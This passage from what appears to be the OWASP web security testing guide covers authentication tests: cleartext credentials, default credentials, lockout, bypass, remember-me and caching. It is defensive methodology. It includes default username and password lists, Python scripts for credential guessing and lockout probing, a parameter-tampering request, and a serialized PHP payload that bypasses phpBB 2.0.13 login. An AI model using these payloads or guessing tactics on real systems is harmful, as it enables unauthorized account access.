This test is done to be sure that an attacker cannot retrieve sensitive information by</p><p>simply sniffing the network.</p><p>How to Test</p><p>Black-Box Testing</p><p>In the following examples we will use a web proxy in order to capture packet headers and to inspect them. You can use</p><p>any web proxy that you prefer.</p><p>Example 1: Sending Data with POST Method Through HTTP</p><p>Suppose that the login page presents a form with fields User, Pass, and the Submit button to authenticate and give</p><p>access to the application. If we look at the headers of our request with a web proxy, we can get something like this:</p><p>POST http://www.example.com/AuthenticationServlet HTTP/1.1</p><p>Host: www.example.com</p><p>User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.14) Gecko/20080404</p><p>Accept: text/xml,application/xml,application/xhtml+xml</p><p>Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3</p><p>Accept-Encoding: gzip,deflate</p><p>Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7</p><p>Keep-Alive: 300</p><p>Connection: keep-alive</p><p>Referer: http://www.example.com/index.jsp</p><p>Cookie: JSESSIONID=LVrRRQQXgwyWpW7QMnS49vtW1yBdqn98CGlkP4jTvVCGdyPkmn3S!</p><p>Content-Type: application/x-www-form-urlencoded</p><p>Content-length: 64</p><p>delegated_service=218&User=test&Pass=test&Submit=SUBMIT</p><p>From this example the tester can understand that the POST request sends the data to the page</p><p>www.example.com/AuthenticationServlet using HTTP. So the data is transmitted without encryption and a malicious</p><p>user could intercept the username and password by simply sniffing the network with a tool like Wireshark.</p><p>Example 2: Sending Data with POST Method Through HTTPS</p><p>Suppose that our web application uses the HTTPS protocol to encrypt the data we are sending (or at least for</p><p>transmitting sensitive data like credentials).
In this case, when logging on to the web application the header of our</p><p>POST request would be similar to the following:</p><p>POST https://www.example.com:443/cgi-bin/login.cgi HTTP/1.1</p><p>Host: www.example.com</p><p>User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.14) Gecko/20080404</p><p>Accept: text/xml,application/xml,application/xhtml+xml,text/html</p><p>Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3</p><p>Accept-Encoding: gzip,deflate</p><p>Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7</p><p>Keep-Alive: 300</p><p>Connection: keep-alive</p><p>Referer: https://www.example.com/cgi-bin/login.cgi</p><p>Cookie: language=English;</p><p>Content-Type: application/x-www-form-urlencoded</p><p>Content-length: 50</p><p>Command=Login&User=test&Pass=test</p><p>We can see that the request is addressed to www.example.com:443/cgi-bin/login.cgi using the HTTPS protocol.</p><p>This ensures that our credentials are sent using an encrypted channel and that the credentials are not readable by a</p><p>malicious user using a sniffer.</p><p>Example 3: Sending Data with POST Method via HTTPS on a Page Reachable via HTTP</p><p>Now, imagine having a web page reachable via HTTP and that only data sent from the authentication form are</p><p>transmitted via HTTPS. This situation occurs, for example, when we are on a portal of a big company that offers various</p><p>information and services that are publicly available, without identification, but the site also has a private section</p><p>accessible from the home page when users log in. 
So when we try to log in, the header of our request will look like the</p><p>following example:</p><p>POST https://www.example.com:443/login.do HTTP/1.1</p><p>Host: www.example.com</p><p>User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.14) Gecko/20080404</p><p>Accept: text/xml,application/xml,application/xhtml+xml,text/html</p><p>Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3</p><p>Accept-Encoding: gzip,deflate</p><p>Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7</p><p>Keep-Alive: 300</p><p>Connection: keep-alive</p><p>Referer: http://www.example.com/homepage.do</p><p>Cookie: SERVTIMSESSIONID=s2JyLkvDJ9ZhX3yr5BJ3DFLkdphH0QNSJ3VQB6pLhjkW6F</p><p>Content-Type: application/x-www-form-urlencoded</p><p>Content-length: 45</p><p>User=test&Pass=test&portal=ExamplePortal</p><p>We can see that our request is addressed to www.example.com:443/login.do using HTTPS. But if we have a look at</p><p>the Referer header (the page from which we came), it is www.example.com/homepage.do and is accessible via plain</p><p>HTTP. Although we are sending data via HTTPS, this deployment can allow SSLStrip attacks.</p><p>https://www.wireshark.org/</p><p>https://moxie.org/software/sslstrip/</p><p>The above-mentioned attack is a man-in-the-middle attack.</p><p>Example 4: Sending Data with GET Method Through HTTPS</p><p>In this last example, suppose that the application transfers data using the GET method. This method should never be</p><p>used in a form that transmits sensitive data such as username and password, because the data is displayed in clear</p><p>text in the URL and this causes a whole set of security issues. For example, the URL that is requested is easily</p><p>available from the server logs or from your browser history, which makes your sensitive data retrievable by</p><p>unauthorized persons.
So this example is purely demonstrative, but, in reality, it is strongly suggested to use the POST</p><p>method instead.</p><p>GET https://www.example.com/success.html?user=test&pass=test HTTP/1.1</p><p>Host: www.example.com</p><p>User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.14) Gecko/20080404</p><p>Accept: text/xml,application/xml,application/xhtml+xml,text/html</p><p>Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3</p><p>Accept-Encoding: gzip,deflate</p><p>Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7</p><p>Keep-Alive: 300</p><p>Connection: keep-alive</p><p>Referer: https://www.example.com/form.html</p><p>If-Modified-Since: Mon, 30 Jun 2008 07:55:11 GMT</p><p>If-None-Match: "43a01-5b-4868915f"</p><p>You can see that the data is transferred in clear text in the URL and not in the body of the request as before. But we</p><p>must consider that SSL/TLS is a level 5 protocol, a lower level than HTTP, so the whole HTTP packet is still encrypted,</p><p>making the URL unreadable to a malicious user sniffing the network. Nevertheless, as stated before, it is not a good practice</p><p>to use the GET method to send sensitive data to a web application, because the information contained in the URL can</p><p>be stored in many locations such as proxy and web server logs.</p><p>Gray-Box Testing</p><p>Speak with the developers of the web application and try to understand if they are aware of the differences between</p><p>HTTP and HTTPS protocols and why they should use HTTPS for transmitting sensitive information.
Then, check with</p><p>them if HTTPS is used in every sensitive request, like those on log in pages, to prevent unauthorized users from intercepting</p><p>the data.</p><p>Tools</p><p>OWASP Zed Attack Proxy (ZAP)</p><p>mitmproxy</p><p>Burp Suite</p><p>Wireshark</p><p>TCPDUMP</p><p>References</p><p>Whitepapers</p><p>HTTP/1.1: Security Considerations</p><p>SSL is not about encryption</p><p>https://en.wikipedia.org/wiki/Man-in-the-middle_attack</p><p>https://owasp.org/www-project-zap/</p><p>https://mitmproxy.org/</p><p>https://portswigger.net/burp</p><p>https://www.wireshark.org/</p><p>https://www.tcpdump.org/</p><p>https://www.w3.org/Protocols/rfc2616/rfc2616-sec15.html</p><p>https://www.troyhunt.com/ssl-is-not-about-encryption/</p><p>Testing for Default Credentials</p><p>ID</p><p>WSTG-ATHN-02</p><p>Summary</p><p>Nowadays web applications often make use of popular open source or commercial software that can be installed on</p><p>servers with minimal configuration or customization by the server administrator. Moreover, a lot of hardware appliances</p><p>(e.g. network routers and database servers) offer web-based configuration or administrative interfaces.</p><p>Often these applications, once installed, are not properly configured and the default credentials provided for initial</p><p>authentication and configuration are never changed. These default credentials are well known by penetration testers</p><p>and, unfortunately, also by malicious attackers, who can use them to gain access to various types of applications.</p><p>Furthermore, in many situations, when a new account is created on an application, a default password (with some</p><p>standard characteristics) is generated.
If this password is predictable and the user does not change it on the first</p><p>access, this can lead to an attacker gaining unauthorized access to the application.</p><p>The root cause of this problem can be identified as:</p><p>Inexperienced IT personnel, who are unaware of the importance of changing default passwords on installed</p><p>infrastructure components, or leave the password as default for “ease of maintenance”.</p><p>Programmers who leave back doors to easily access and test their application and later forget to remove them.</p><p>Applications with built-in non-removable default accounts with a preset username and password.</p><p>Applications that do not force the user to change the default credentials after the first log in.</p><p>How to Test</p><p>Testing for Default Credentials of Common Applications</p><p>In black-box testing the tester knows nothing about the application and its underlying infrastructure. In reality this is</p><p>often not true, and some information about the application is known. We suppose that you have identified, through the</p><p>use of the techniques described in this Testing Guide under the chapter Information Gathering, at least one or more</p><p>common applications that may contain accessible administrative interfaces.</p><p>When you have identified an application interface, for example a Cisco router web interface or a WebLogic</p><p>administrator portal, check whether the known usernames and passwords for these devices result in successful</p><p>authentication. To do this you can consult the manufacturer’s documentation or, in a much simpler way, you can find</p><p>common credentials using a search engine or by using one of the sites or tools listed in the Reference section.</p><p>When facing applications where we do not have a list of default and common user accounts (for example due to the fact</p><p>that the application is not widespread) we can attempt to guess valid default credentials.
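</p><p>As a simple illustration of this guessing strategy, candidate username/password pairs can be generated programmatically from short lists of common defaults plus the application’s own name. The lists below are a small illustrative subset, and “obscurity” is a stand-in for the name of the application under test:</p><p>

```python
# Build candidate (username, password) pairs for default-credential
# guessing: the cartesian product of common defaults, plus the pair named
# after the application itself.
from itertools import product

COMMON_USERS = ["admin", "administrator", "root", "system", "guest"]
COMMON_PASSWORDS = ["", "password", "pass123", "password123", "admin", "guest"]

def candidate_pairs(app_name):
    pairs = list(product(COMMON_USERS, COMMON_PASSWORDS))
    # Applications are often administered under an account named after them.
    pairs.append((app_name, app_name))
    return pairs

pairs = candidate_pairs("obscurity")
print(len(pairs))   # 5 users x 6 passwords + 1 = 31 candidates
print(pairs[-1])    # ('obscurity', 'obscurity')
```

Feeding such a list into a request loop (or a tool like Burp Intruder or THC Hydra) is straightforward, but the lockout considerations discussed in this section apply: pace the attempts and account for lockout policy before spraying.</p><p>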
Note that the application</p><p>being tested may have an account lockout policy enabled, and multiple password guess attempts with a known</p><p>username may cause the account to be locked. If it is possible to lock the administrator account, it may be troublesome</p><p>for the system administrator to reset it.</p><p>Many applications have verbose error messages that inform the site users as to the validity of entered usernames. This</p><p>information will be helpful when testing for default or guessable user accounts. Such functionality can be found, for</p><p>example, on the log in page, password reset and forgotten password page, and sign up page. Once you have found a</p><p>default username you could also start guessing passwords for this account.</p><p>More information about this procedure can be found in the section Testing for User Enumeration and Guessable User</p><p>Account and in the section Testing for Weak Password Policy.</p><p>Since these types of default credentials are often bound to administrative accounts you can proceed in this manner:</p><p>Try the following usernames - “admin”, “administrator”, “root”, “system”, “guest”, “operator”, or “super”. These are</p><p>popular among system administrators and are often used. Additionally you could try “qa”, “test”, “test1”, “testing”</p><p>and similar names. Attempt any combination of the above in both the username and the password fields. If the</p><p>application is vulnerable to username enumeration, and you manage to successfully identify any of the above</p><p>usernames, attempt passwords in a similar manner. In addition try an empty password or one of the following:</p><p>“password”, “pass123”, “password123”, “admin”, or “guest” with the above accounts or any other enumerated</p><p>accounts. Further permutations of the above can also be attempted.
If these passwords fail, it may be worth using a</p><p>common username and password list and attempting multiple requests against the application. This can, of course,</p><p>be scripted to save time.</p><p>Application administrative users are often named after the application or organization. This means if you are</p><p>testing an application named “Obscurity”, try using obscurity/obscurity or any other similar combination as the</p><p>username and password.</p><p>When performing a test for a customer, attempt using names of contacts you have received as usernames with any</p><p>common passwords. Customer email addresses may reveal the user accounts’ naming convention: if employee</p><p>John Doe has the email address jdoe@example.com, you can try to find the names of system administrators on</p><p>social media and guess their username by applying the same naming convention to their name.</p><p>Attempt using all the above usernames with blank passwords.</p><p>Review the page source and JavaScript either through a proxy or by viewing the source. Look for any references to</p><p>users and passwords in the source. For example “If username=’admin’ then starturl=/admin.asp else /index.asp”</p><p>(for a successful log in versus a failed log in). Also, if you have a valid account, then log in and view every request</p><p>and response for a valid log in versus an invalid log in, such as additional hidden parameters, interesting GET</p><p>requests (login=yes), etc.</p><p>Look for account names and passwords written in comments in the source code. Also look in backup directories for</p><p>source code (or backups of source code) that may contain interesting comments and code.</p><p>Testing for Default Password of New Accounts</p><p>It can also occur that when a new account is created in an application the account is assigned a default password. This</p><p>password could have some standard characteristics making it predictable.
If the user does not change it on first usage (this often happens if the user is not forced to change it), or if the user has not yet logged on to the application, an attacker can gain unauthorized access to the application.</p><p>The advice given before about a possible lockout policy and verbose error messages is also applicable here when testing for default passwords.</p><p>The following steps can be applied to test for these types of default credentials:</p><p>Looking at the User Registration page may help to determine the expected format and minimum or maximum length of the application usernames and passwords. If a user registration page does not exist, determine if the organization uses a standard naming convention for user names, such as their email address or the name before the "@" in the email.</p><p>Try to extrapolate from the application how usernames are generated. For example, can a user choose their own username, or does the system generate an account name for the user based on some personal information or by using a predictable sequence? If the application does generate account names in a predictable sequence, such as user7811, try fuzzing all possible accounts recursively. If you can identify a different response from the application when using a valid username and a wrong password, then you can try a brute force attack on the valid username (or quickly try any of the identified common passwords above or in the reference section).</p><p>Try to determine if the system-generated password is predictable. To do this, create many new accounts quickly after one another so that you can compare and determine if the passwords are predictable.
If predictable, try to correlate these with the usernames, or any enumerated accounts, and use them as a basis for a brute force attack.</p><p>If you have identified the correct naming convention for the user name, try to "brute force" passwords with some common predictable sequence, for example dates of birth.</p><p>Attempt using all the above usernames with blank passwords, or using the username also as the password value.</p><p>Gray-Box Testing</p><p>The following steps rely on an entirely gray-box approach. If only some of this information is available to you, refer to black-box testing to fill the gaps.</p><p>Talk to the IT personnel to determine which passwords they use for administrative access and how administration of the application is undertaken.</p><p>Ask IT personnel if default passwords are changed and if default user accounts are disabled.</p><p>Examine the user database for default credentials as described in the black-box testing section. Also check for empty password fields.</p><p>Examine the code for hard-coded usernames and passwords.</p><p>Check for configuration files that contain usernames and passwords.</p><p>Examine the password policy and, if the application generates its own passwords for new users, check the policy in use for this procedure.</p><p>Tools</p><p>Burp Intruder</p><p>THC Hydra</p><p>Nikto 2</p><p>References</p><p>CIRT</p><p>https://portswigger.net/burp</p><p>https://github.com/vanhauser-thc/thc-hydra</p><p>https://www.cirt.net/nikto2</p><p>https://cirt.net/passwords</p><p>Testing for Weak Lock Out Mechanism</p><p>ID</p><p>WSTG-ATHN-03</p><p>Summary</p><p>Account lockout mechanisms are used to mitigate brute force password guessing attacks.
Accounts are typically locked</p><p>after 3 to 5 unsuccessful login attempts and can only be unlocked after a predetermined period of time, via a self-</p><p>service unlock mechanism, or intervention by an administrator. Account lockout mechanisms require a balance</p><p>between protecting accounts from unauthorized access and protecting users from being denied authorized access.</p><p>Note that this test should cover all aspects of authentication where lockout mechanisms would be appropriate, e.g.</p><p>when the user is presented with security questions during forgotten password mechanisms (see Testing for Weak</p><p>security question/answer).</p><p>Without a strong lockout mechanism, the application may be susceptible to brute force attacks. After a successful brute</p><p>force attack, a malicious user could have access to:</p><p>Confidential information or data: Private sections of a web application could disclose confidential documents,</p><p>users’ profile data, financial information, bank details, users’ relationships, etc.</p><p>Administration panels: These sections are used by webmasters to manage (modify, delete, add) web application</p><p>content, manage user provisioning, assign different privileges to the users, etc.</p><p>Opportunities for further attacks: authenticated sections of a web application could contain vulnerabilities that are</p><p>not present in the public section of the web application and could contain advanced functionality that is not</p><p>available to public users.</p><p>Test Objectives</p><p>1. Evaluate the account lockout mechanism’s ability to mitigate brute force password guessing.</p><p>2. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.</p><p>How to Test</p><p>Typically, to test the strength of lockout mechanisms, you will need access to an account that you are willing or can</p><p>afford to lock. 
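</p><p>Probing the lockout threshold, as this test does, can be scripted. The sketch below is an illustrative Python outline, not a drop-in tool: attempt_login stands in for however the tester submits credentials, and FakeAccount merely simulates a server that locks after a number of consecutive failures so the probe logic can be sanity-checked offline.</p>

```python
def find_lockout_threshold(attempt_login, correct_password, wrong_password, max_attempts=10):
    """Probe how many consecutive wrong passwords lock the account.

    attempt_login(password) -> True on successful authentication. Assumes a
    successful log in resets the failure counter, as is common. Returns the
    number of wrong attempts after which the account locked, or None if no
    lockout was observed within max_attempts.
    """
    for wrong_tries in range(1, max_attempts + 1):
        for _ in range(wrong_tries):
            attempt_login(wrong_password)        # deliberately fail wrong_tries times
        if not attempt_login(correct_password):  # correct password now rejected -> locked
            return wrong_tries
    return None

class FakeAccount:
    """Simulated target: locks after `threshold` consecutive failures."""
    def __init__(self, password, threshold=5):
        self.password, self.threshold = password, threshold
        self.failures, self.locked = 0, False

    def attempt(self, password):
        if self.locked:
            return False
        if password == self.password:
            self.failures = 0
            return True
        self.failures += 1
        self.locked = self.failures >= self.threshold
        return False
```

<p>Run this only against an expendable account, and note that some implementations count failures cumulatively rather than consecutively, which would shift the reported threshold.</p><p>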
If you have only one account with which you can log on to the web application, perform this test at the end of your test plan, so that a locked account does not prevent you from completing the rest of your testing.</p><p>To evaluate the account lockout mechanism's ability to mitigate brute force password guessing, attempt an invalid log in by using the incorrect password a number of times, before using the correct password to verify that the account was locked out. An example test may be as follows:</p><p>1. Attempt to log in with an incorrect password 3 times.</p><p>2. Successfully log in with the correct password, thereby showing that the lockout mechanism doesn't trigger after 3 incorrect authentication attempts.</p><p>3. Attempt to log in with an incorrect password 4 times.</p><p>4. Successfully log in with the correct password, thereby showing that the lockout mechanism doesn't trigger after 4 incorrect authentication attempts.</p><p>5. Attempt to log in with an incorrect password 5 times.</p><p>6. Attempt to log in with the correct password. The application returns "Your account is locked out.", thereby confirming that the account is locked out after 5 incorrect authentication attempts.</p><p>7. Attempt to log in with the correct password 5 minutes later. The application returns "Your account is locked out.", thereby showing that the lockout mechanism does not automatically unlock after 5 minutes.</p><p>8. Attempt to log in with the correct password 10 minutes later. The application returns "Your account is locked out.", thereby showing that the lockout mechanism does not automatically unlock after 10 minutes.</p><p>9.
Successfully log in with the correct password 15 minutes later, thereby showing that the lockout mechanism automatically unlocks after a 10 to 15 minute period.</p><p>A CAPTCHA may hinder brute force attacks, but it can come with its own set of weaknesses, and it should not replace a lockout mechanism.</p><p>To evaluate the unlock mechanism's resistance to unauthorized account unlocking, initiate the unlock mechanism and look for weaknesses. Typical unlock mechanisms may involve secret questions or an emailed unlock link. The unlock link should be a unique one-time link, to stop an attacker from guessing or replaying the link and performing brute force attacks in batches. Secret questions and answers should be strong (see Testing for Weak Security Question/Answer).</p><p>Note that an unlock mechanism should only be used for unlocking accounts. It is not the same as a password recovery mechanism.</p><p>Factors to consider when implementing an account lockout mechanism:</p><p>1. What is the risk of brute force password guessing against the application?</p><p>2. Is a CAPTCHA sufficient to mitigate this risk?</p><p>3. Is a client-side lockout mechanism being used (e.g., JavaScript)? (If so, disable the client-side code to test.)</p><p>4. Number of unsuccessful log in attempts before lockout. If the lockout threshold is too low, valid users may be locked out too often. If the lockout threshold is too high, an attacker can make more attempts to brute force the account before it is locked. Depending on the application's purpose, a range of 5 to 10 unsuccessful attempts is a typical lockout threshold.</p><p>5. How will accounts be unlocked?</p><p>i. Manually by an administrator: this is the most secure lockout method, but may cause inconvenience to users and take up the administrator's "valuable" time.</p><p>a.
Note that the administrator should also have a recovery method in case their own account gets locked.</p><p>b. This unlock mechanism may lead to a denial-of-service attack if an attacker's goal is to lock the accounts of all users of the web application.</p><p>ii. After a period of time: What is the lockout duration? Is this sufficient for the application being protected? E.g. a 5 to 30 minute lockout duration may be a good compromise between mitigating brute force attacks and inconveniencing valid users.</p><p>iii. Via a self-service mechanism: As stated before, this self-service mechanism must be secure enough to prevent the attacker from unlocking accounts themselves.</p><p>References</p><p>See the OWASP article on Brute Force Attacks.</p><p>Remediation</p><p>Apply account unlock mechanisms depending on the risk level. In order from lowest to highest assurance:</p><p>1. Time-based lockout and unlock.</p><p>2. Self-service unlock (sends unlock email to registered email address).</p><p>3. Manual administrator unlock.</p><p>4. Manual administrator unlock with positive user identification.</p><p>https://owasp.org/www-community/attacks/Brute_force_attack</p><p>Testing for Bypassing Authentication Schema</p><p>ID</p><p>WSTG-ATHN-04</p><p>Summary</p><p>In computer security, authentication is the process of attempting to verify the digital identity of the sender of a communication. A common example of such a process is the log on process. Testing the authentication schema means understanding how the authentication process works and using that information to circumvent the authentication mechanism.</p><p>While most applications require authentication to gain access to private information or to execute tasks, not every authentication method is able to provide adequate security.
Negligence, ignorance, or simple underestimation of security threats often results in authentication schemes that can be bypassed by simply skipping the log in page and directly calling an internal page that is supposed to be accessed only after authentication has been performed.</p><p>In addition, it is often possible to bypass authentication measures by tampering with requests and tricking the application into thinking that the user is already authenticated. This can be accomplished either by modifying the given URL parameter, by manipulating the form, or by counterfeiting sessions.</p><p>Problems related to the authentication schema can be found at different stages of the software development life cycle (SDLC), like the design, development, and deployment phases:</p><p>In the design phase errors can include a wrong definition of application sections to be protected, the choice of not applying strong encryption protocols for securing the transmission of credentials, and many more.</p><p>In the development phase errors can include the incorrect implementation of input validation functionality or not following the security best practices for the specific language.</p><p>In the application deployment phase, there may be issues during the application setup (installation and configuration activities) due to a lack of required technical skills or due to the lack of good documentation.</p><p>How to Test</p><p>Black-Box Testing</p><p>There are several methods of bypassing the authentication schema that is used by a web application:</p><p>Direct page request (forced browsing)</p><p>Parameter modification</p><p>Session ID prediction</p><p>SQL injection</p><p>Direct Page Request</p><p>If a web application implements access control only on the log in page, the authentication schema could be bypassed. For example, if a user directly requests a different page via forced browsing, that page may not check the credentials
of the user before granting access. Attempt to directly access a protected page through the address bar in your browser to test using this method.</p><p>https://owasp.org/www-community/attacks/Forced_browsing</p><p>Figure 4.4.4-1: Direct Request to Protected Page</p><p>Parameter Modification</p><p>Another problem related to authentication design is when the application verifies a successful log in on the basis of a fixed value parameter. A user could modify these parameters to gain access to the protected areas without providing valid credentials. In the example below, the "authenticated" parameter is changed to a value of "yes", which allows the user to gain access. In this example, the parameter is in the URL, but a proxy could also be used to modify the parameter, especially when the parameters are sent as form elements in a POST request or when the parameters are stored in a cookie.</p><p>http://www.site.com/page.asp?authenticated=no</p><p>raven@blackbox /home $nc www.site.com 80</p><p>GET /page.asp?authenticated=yes HTTP/1.0</p><p>HTTP/1.1 200 OK</p><p>Date: Sat, 11 Nov 2006 10:22:44 GMT</p><p>Server: Apache</p><p>Connection: close</p><p>Content-Type: text/html; charset=iso-8859-1</p><p><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"></p><p><HTML><HEAD></p><p></HEAD><BODY></p><p><H1>You Are Authenticated</H1></p><p></BODY></HTML></p><p>Figure 4.4.4-2: Parameter Modified Request</p><p>Session ID Prediction</p><p>Many web applications manage authentication by using session identifiers (session IDs).
Therefore, if session ID generation is predictable, a malicious user could be able to find a valid session ID and gain unauthorized access to the application, impersonating a previously authenticated user.</p><p>In the following figure, values inside cookies increase linearly, so it could be easy for an attacker to guess a valid session ID.</p><p>Figure 4.4.4-3: Cookie Values Over Time</p><p>In the following figure, values inside cookies change only partially, so it's possible to restrict a brute force attack to the defined fields shown below.</p><p>Figure 4.4.4-4: Partially Changed Cookie Values</p><p>SQL Injection (HTML Form Authentication)</p><p>SQL Injection is a widely known attack technique. This section is not going to describe this technique in detail as there are several sections in this guide that explain injection techniques beyond the scope of this section.</p><p>Figure 4.4.4-5: SQL Injection</p><p>The following figure shows that with a simple SQL injection attack, it is sometimes possible to bypass the authentication form.</p><p>Figure 4.4.4-6: Simple SQL Injection Attack</p><p>Gray-Box Testing</p><p>If an attacker has been able to retrieve the application source code by exploiting a previously discovered vulnerability (e.g., directory traversal), or from a web repository (Open Source Applications), it could be possible to perform refined attacks against the implementation of the authentication process.</p><p>In the following example (PHPBB 2.0.13 - Authentication Bypass Vulnerability), at line 5 the unserialize() function parses a user supplied cookie and sets values inside the $row array. At line 10 the user's MD5 password hash stored inside the back end database is compared to the one supplied.</p><p>1. if ( isset($HTTP_COOKIE_VARS[$cookiename . '_sid']) ||</p><p>2. {</p><p>3.
$sessiondata = isset( $HTTP_COOKIE_VARS[$cookiename . '_data'] ) ?</p><p>4.</p><p>5. unserialize(stripslashes($HTTP_COOKIE_VARS[$cookiename . '_data'])) : array();</p><p>6.</p><p>7. $sessionmethod = SESSION_METHOD_COOKIE;</p><p>8. }</p><p>9.</p><p>10. if( md5($password) == $row['user_password'] && $row['user_active'] )</p><p>11.</p><p>12. {</p><p>13. $autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;</p><p>14. }</p><p>In PHP, a loose comparison ( == ) between a non-empty string value and the boolean value TRUE evaluates to TRUE, so by supplying the following string (the important part is "b:1") to the unserialize() function, it is possible to bypass the authentication control:</p><p>a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}</p><p>Tools</p><p>WebGoat</p><p>OWASP Zed Attack Proxy (ZAP)</p><p>References</p><p>Whitepapers</p><p>Mark Roxberry: "PHPBB 2.0.13 vulnerability"</p><p>David Endler: "Session ID Brute Force Exploitation and Prediction"</p><p>https://owasp.org/www-project-webgoat/</p><p>https://www.zaproxy.org/</p><p>https://www.cgisecurity.com/lib/SessionIDs.pdf</p><p>Testing for Vulnerable Remember Password</p><p>ID</p><p>WSTG-ATHN-05</p><p>Summary</p><p>Credentials are the most widely used authentication technology.
Due to such a wide usage of username-password pairs, users are no longer able to properly handle their credentials across the multitude of used applications.</p><p>In order to assist users with their credentials, multiple technologies surfaced:</p><p>Applications provide a remember me functionality that allows the user to stay authenticated for long periods of time, without asking the user again for their credentials.</p><p>Password Managers - including browser password managers - that allow the user to store their credentials in a secure manner and later on inject them in user-forms without any user intervention.</p><p>How to Test</p><p>As these methods provide a better user experience and allow the user to forget all about their credentials, they increase the attack surface area. Some applications:</p><p>Store the credentials in an encoded fashion in the browser's storage mechanisms, which can be verified by following the web storage testing scenario and going through the session analysis scenarios. Credentials shouldn't be stored in any way in the client-side application, and should be substituted by tokens generated from the server side.</p><p>Automatically inject the user's credentials, which can be abused by:</p><p>ClickJacking attacks.</p><p>CSRF attacks.</p><p>Tokens should be analyzed in terms of token lifetime, where some tokens never expire and put the users in danger if those tokens ever get stolen.
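</p><p>Where the token is a JWT, its lifetime can be inspected directly by decoding the payload; no signature verification is needed just to read claims. The sketch below assumes the standard iat and exp claim names from RFC 7519; a token without an exp claim is the dangerous never-expiring case described above.</p>

```python
import base64
import json

def jwt_lifetime(token):
    """Return (issued_at, expires_at) Unix timestamps from a JWT's payload.

    The signature is NOT verified -- this only reads claims for analysis.
    Either value is None when the corresponding claim (iat / exp) is absent;
    a missing exp means the token never expires.
    """
    payload_b64 = token.split(".")[1]
    payload_b64 += "=" * (-len(payload_b64) % 4)  # restore stripped base64url padding
    claims = json.loads(base64.urlsafe_b64decode(payload_b64))
    return claims.get("iat"), claims.get("exp")
```

<p>Comparing the two timestamps against the application's stated session policy quickly shows whether remember-me tokens outlive what the policy allows.</p><p>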
Make sure to follow the session timeout testing scenario.</p><p>Remediation</p><p>Follow session management good practices.</p><p>Ensure that no credentials are stored in clear text or are easily retrievable in encoded or encrypted forms in browser storage mechanisms; they should be stored on the server side and follow password storage good practices.</p><p>https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html</p><p>https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html</p><p>Testing for Browser Cache Weaknesses</p><p>ID</p><p>WSTG-ATHN-06</p><p>Summary</p><p>In this phase the tester checks that the application correctly instructs the browser to not retain sensitive data.</p><p>Browsers can store information for purposes of caching and history. Caching is used to improve performance, so that previously displayed information doesn't need to be downloaded again. History mechanisms are used for user convenience, so the user can see exactly what they saw at the time when the resource was retrieved. If sensitive information is displayed to the user (such as their address, credit card details, Social Security Number, or username), then this information could be stored for purposes of caching or history, and therefore retrievable through examining the browser's cache or by simply pressing the browser's Back button.</p><p>Test Objectives</p><p>The objective of this test is to evaluate whether or not the application stores sensitive information in client accessible locations or in a manner which does not prevent their access or review outside of an authenticated and authorized session.
Specifically, this tests whether sensitive information is stored:</p><p>On disk or in memory, where it might be retrieved after intended use.</p><p>In such a way that using the Back button may allow a user (or attacker) to return to a previously displayed screen.</p><p>How to Test</p><p>Browser History</p><p>Technically, the Back button is a history and not a cache (see https://www.w3.org/Protocols/rfc2616/rfc2616-</p><p>sec13.html#sec13.13). The cache and the history are two different entities. However, they share the same weakness of</p><p>presenting previously displayed sensitive information.</p><p>The first and simplest test consists of entering sensitive information into the application and logging out. Then the tester</p><p>clicks the Back button of the browser to check whether previously displayed sensitive information can be accessed</p><p>whilst unauthenticated.</p><p>If by pressing the Back button the tester can access previous pages but not access new ones, then it is not an</p><p>authentication issue, but a browser history issue. If these pages contain sensitive data, it means that the application did</p><p>not forbid the browser from storing it.</p><p>Authentication does not necessarily need to be involved in the testing. For example, when a user enters their email</p><p>address in order to sign up to a newsletter, this information could be retrievable if not properly handled.</p><p>The Back button can be stopped from showing sensitive data. This can be done by:</p><p>Delivering the page over HTTPS.</p><p>Setting Cache-Control: must-revalidate</p><p>Browser Cache</p><p>Here testers check that the application does not leak any sensitive data into the browser cache. In order to do that, they</p><p>can use a proxy (such as OWASP ZAP) and search through the server responses that belong to the session, checking</p><p>that for every page that contains sensitive information the server instructed the browser not to cache any data. 
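</p><p>These response checks are easy to automate across a set of captured URLs. The sketch below flags responses whose Cache-Control header lacks the no-cache and no-store directives; the check_page URL is a placeholder for pages recorded during the proxied session.</p>

```python
from urllib import request

def caching_disabled(headers):
    """True when the response headers forbid caching of the page.

    headers: mapping of HTTP response header names to values; names are
    treated case-insensitively. The check requires Cache-Control to carry
    both the no-cache and no-store directives.
    """
    lowered = {name.lower(): value.lower() for name, value in headers.items()}
    cache_control = lowered.get("cache-control", "")
    return "no-cache" in cache_control and "no-store" in cache_control

def check_page(url):
    """Fetch a single page and report whether its headers disable caching."""
    with request.urlopen(url, timeout=5) as resp:
        return caching_disabled(dict(resp.headers))
```

<p>Any sensitive page for which caching_disabled returns False is a candidate for the manual cache inspection described below.</p><p>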
